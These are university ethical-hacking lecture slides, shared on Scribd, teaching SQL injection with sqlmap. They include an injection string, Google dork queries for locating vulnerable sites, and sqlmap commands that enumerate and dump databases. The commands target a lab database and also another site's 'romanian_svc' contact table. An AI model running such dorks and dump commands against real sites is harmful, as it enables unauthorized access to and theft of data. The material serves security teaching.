Scribd
Upload
967 views23 pages

CH 04 SQLmap

The document is an introduction to web security and ethical hacking, focusing on SQL injection attacks and the use of the Sqlmap tool. It covers various topics including web security considerations, user authentication, and different types of web attacks. The learning outcome is for students to be able to perform SQL injection attacks using Sqlmap, with practical demonstrations included.

Uploaded by

xiyaj40438
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
967 views23 pages

CH 04 SQLmap

The document is an introduction to web security and ethical hacking, focusing on SQL injection attacks and the use of the Sqlmap tool. It covers various topics including web security considerations, user authentication, and different types of web attacks. The learning outcome is for students to be able to perform SQL injection attacks using Sqlmap, with practical demonstrations included.

Uploaded by

xiyaj40438
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd

Introduction to Web Security and

Attacks

Honours Course – Ethical Hacking


Suvarna Chaure
Assistant Professor
Dept. of Computer Engineering,
SIES Graduate School of Technology

1
Suvarna Chaure
Topics

OWASP, Web Security Considerations, User Authentication, Cookies, SSL,


HTTPS, Privacy on Web, Account Harvesting, Web Bugs, Sniffing, ARP
poisoning, Denial of service attacks, Hacking Web Applications,
Clickjacking, Cross-Site scripting and Request Forgery, Session Hijacking
and Management, Phishing and Pharming Techniques, SSO, Vulnerability
assessments, SQL injection, Web Service Security, OAuth 2.0,
Demonstration of hacking tools on Kali Linux such as SQLMap, HTTrack,
hping, burp suite,Wireshark etc.

2
Suvarna Chaure
Learning Outcomes: Student should be able to perform
SQL Injection Attack using Sqlmap tool.

Department of Computer Engineering


Suvarna Chaure
Agenda

• Introduction to SQL injection Attack


• Google Dorking
• Vulnerable Site
• Installation of Sqlmap
• SQL injection using Sqlmap
• Demonstration using Different Websites

4
Suvarna Chaure
SQL Injection Attack

5
Suvarna Chaure
Basics of SQL Injection Attack

1. What are injection attacks?


2. How SQL Injection Works?

6
Suvarna Chaure
Injection

 Injection attacks trick an application into including


unintended commands in the data send to an
interpreter.
Interpret strings as commands.
Ex: SQL, shell ([Link], bash).
 Key Idea
Input data from the application is executed as code by the interpreter.
Important inject able string is : 1’or’1’=‘1.

7
Suvarna Chaure
SQL Injection
1. App sends form to user. Attacker
2. Attacker submits form Form
with SQL exploit data. User

3. Application builds string Pass ‘ or 1=1--


with exploit data.
4. Application sends SQL
query to DB.
5. DB executes query, Firewall
including exploit, sends
data back to application.
6. Application returns data
to user.

DB Server
Web Server
Department of Computer Engineering
8
Why SQL injection?

 Identify inject able parameters.


 Identify the database type and version.
 Discover database schema.
 Extracting data.
 Insert, modify or delete data.
 Denial of service to authorized users by
locking or deleting tables.

9
Suvarna Chaure
Example of SQL Injection

10
Suvarna Chaure
More malicious example

11
Suvarna Chaure
Procedure for SQL injection

Step 1: Finding Vulnerable Website


Some Examples:
inurl:[Link]?id=
inurl:[Link]?id=
inurl:[Link]?id=
inurl:pageid=

12
Suvarna Chaure
Continue……….

13
Suvarna Chaure
Sqlmap for sql injection attack

 Sqlmap is written in python, the first thing you need is the python interpreter.
 Download the python interpreter from [Link]. There are two series of python, 2.7.x and
3.3.x. Sqlmap should run fine with either.
 So download and install.
 Next download the sqlmap zip file from [Link]. Extract the zip files in any directory.
 Launch the dos prompt and navigate to the directory of sqlmap.
 Now run the [Link] script with the python interpreter.

14
Suvarna Chaure
Continue......

15
Suvarna Chaure
Continue...

 It checks the input parameters to find if


they are vulnerable to sql injection or not.
 In the process sqlmap is also able to
identify the remote system os, database
name and version.
 C:\sqlmapproject-sqlmap-
756f02f>[Link] -u
"[Link]
[Link]?cat=1"
16
Suvarna Chaure
Continue......

17
Suvarna Chaure
Discover Databases

C:\sqlmapproject-sqlmap-756f02f>[Link] -u
"[Link] --dbs

18
Suvarna Chaure
Find tables in a particular
C:\sqlmapproject-sqlmap-756f02f>[Link] -u "[Link]

database
cat=1" --tables -D acuart

19
Suvarna Chaure
Get columns of a table

C:\sqlmapproject-sqlmap-756f02f>[Link] -u
"[Link]
cat=1" --columns -D acuart -T artists

20
Suvarna Chaure
Get data from a table

C:\sqlmapproject-sqlmap-756f02f>[Link]
-u
"[Link]
cat=1" --dump -D acuart -T artists

21
Suvarna Chaure
Continue....

 [Link] -u "[Link] --dbs


 [Link] -u "[Link] -D romanian_svc --tables
 [Link] -u "[Link] -D romanian_svc -T ra_contact --
columns
 [Link] -u "[Link] -D romanian_svc -T ra_contact -
Cemail,functie,id,[Link] --dump

22
Suvarna Chaure
Thank You!
(suvarnacl@[Link])

23
Suvarna Chaure

You might also like